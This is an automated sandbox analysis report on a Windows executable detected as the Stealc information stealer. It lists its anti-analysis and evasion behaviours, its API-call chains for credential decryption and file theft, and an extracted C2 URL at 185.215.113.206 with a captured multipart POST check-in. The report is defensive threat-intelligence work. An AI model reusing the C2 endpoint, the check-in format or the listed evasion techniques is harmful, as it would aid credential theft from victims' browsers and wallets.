
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561397
MD5: 69cbce48a9ce8b1da7a0195ae4dfbccc
SHA1: c05a7472201be886b55e2958351df9e211fbe639
SHA256: 65e88eb9ca629cda57680a4f4f7d0d39fe7dfe7ef80d619b809779e9ecff33ad
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2508 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 69CBCE48A9CE8B1DA7A0195AE4DFBCCC)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration:
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1501268976.000000000101E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1442560518.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 2508 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 2508 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-23T10:33:19.457814+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49704 | 185.215.113.206 | 80 | TCP


              AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.php6E | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpBE | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/Q | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpfE | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/V | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1501268976.000000000101E000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_004F4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_004F60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005140B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_005140B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00506960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00506960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_004FEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00506B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00506B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_004F9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_004F9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_004F7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005018A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005018A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00503910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00503910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00501250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00501250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00501269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00501269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0050E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00504B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00504B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00504B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00504B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0050CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00502390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00502390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004FDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004FDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005023A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005023A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0050D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0050DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004F16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004F16B9

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49704 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected (request headers and decoded multipart body):
POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKFHCAKJDBKKEBFIIJJE
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache

------AKFHCAKJDBKKEBFIIJJE
Content-Disposition: form-data; name="hwid"

9B30FF8D4CBE2099925286
------AKFHCAKJDBKKEBFIIJJE
Content-Disposition: form-data; name="build"

mars
------AKFHCAKJDBKKEBFIIJJE--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy
Source: unknown | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 to Host 185.215.113.206 (Content-Length: 211, multipart/form-data with fields hwid=9B30FF8D4CBE2099925286 and build=mars; the same request as the global traffic entry above)
Source: file.exe, 00000000.00000002.1501268976.000000000101E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1501268976.0000000001079000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1501268976.0000000001079000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/V
Source: file.exe, 00000000.00000002.1501268976.0000000001079000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1501268976.0000000001079000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/Q
Source: file.exe, 00000000.00000002.1501268976.0000000001064000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php6E
Source: file.exe, 00000000.00000002.1501268976.0000000001064000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpBE
Source: file.exe, 00000000.00000002.1501268976.0000000001064000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpfE
Source: file.exe, 00000000.00000002.1501268976.0000000001079000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/f
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop

              System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007EC860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0085A859
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005148B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B4875
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008AC18D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A71BB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B3966
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B325C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D0A28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B620D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0076F2E9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CA377
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A8BBF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008ADCDF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B8C6A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B05A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007DA546
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A5674
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 004F4A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: kuxshahz ZLIB complexity 0.9946806168421833
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00513A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\6OU64QPA.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1832448 > 1048576
Source: file.exe | Static PE information: Raw size of kuxshahz is bigger than: 0x100000 < 0x1a5600

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.4f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kuxshahz:EW;horlowmv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kuxshahz:EW;horlowmv:EW;.taggant:EW;
